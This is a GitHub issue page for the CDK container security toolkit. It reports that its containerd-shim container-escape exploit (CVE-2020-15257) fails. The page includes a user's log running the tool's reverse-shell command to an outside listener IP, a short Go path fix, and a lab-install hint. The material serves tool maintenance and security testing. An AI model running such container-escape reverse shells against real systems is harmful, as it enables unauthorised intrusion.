Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

CDK v1.5.4 EXP 出错: /pkg/exploit/escaping/containerd_shim_pwn.go #114

Closed
neargle opened this issue Feb 15, 2025 · 3 comments
Closed

CDK v1.5.4 EXP 出错: /pkg/exploit/escaping/containerd_shim_pwn.go #114

neargle opened this issue Feb 15, 2025 · 3 comments
Assignees
@neargle
Labels
bug Something isn't working

Comments

@neargle
Copy link
Member

neargle commented Feb 15, 2025
edited
Loading

来自微信网友反馈:

root@ubuntu-attack:/tmp# ./cdk run shim-pwn reverse 192.168.202.128 81
2024/12/22 07:13:52 trying to spawn shell to 192.168.202.128:81
2024/12/22 07:13:52 try socket: @/containerd-shim/moby/3925849af0bf88543b55ca09923c29636e69716b2cbd309721ad83baa9299eac/shim.sock
2024/12/22 07:13:52 fail to connect unix socket /containerd-shim/moby/3925849af0bf88543b55ca09923c29636e69716b2cbd309721ad83baa9299eac/shim.sock:
dial unix /containerd-shim/moby/3925849af0bf88543b55ca09923c29636e69716b2cbd309721ad83baa9299eac/shim.sock: connect: connection refused
2024/12/22 07:13:52 exploit failed.

Image
@neargle
Copy link
Member Author

neargle commented Feb 15, 2025

核心问题应该是:

-       absPath := GetDockerAbsPath()
-       absPath = strings.TrimSuffix(absPath, "/merged")
-       dockerAbsPath := filepath.Join(absPath, "merged", localBundlePath)
+       dockerAbsPath := GetDockerAbsPath() + "/merged" + localBundlePath

@neargle neargle self-assigned this Feb 15, 2025
@neargle neargle added the bug Something isn't working label Feb 15, 2025
@neargle
Copy link
Member Author

neargle commented Feb 22, 2025

/~https://github.com/Metarget/metarget/archive/refs/heads/master.zip 看起来缺乏维护了,会报错

cnv install cve-2020-15257

@neargle
Copy link
Member Author

neargle commented Feb 22, 2025

先加一个 log,以便再发现的问题的时候可以 debug。留个 TODO,这个 EXP 需要再一次 review。

neargle added a commit that referenced this issue Feb 22, 2025
@neargle
Merge pull request #115 from cdk-team/main-dev
b410542 
fix #114 (shim_pwn): a new log for debug, need to fix the bug in future
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees

@neargle neargle

Labels
bug Something isn't working
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@neargle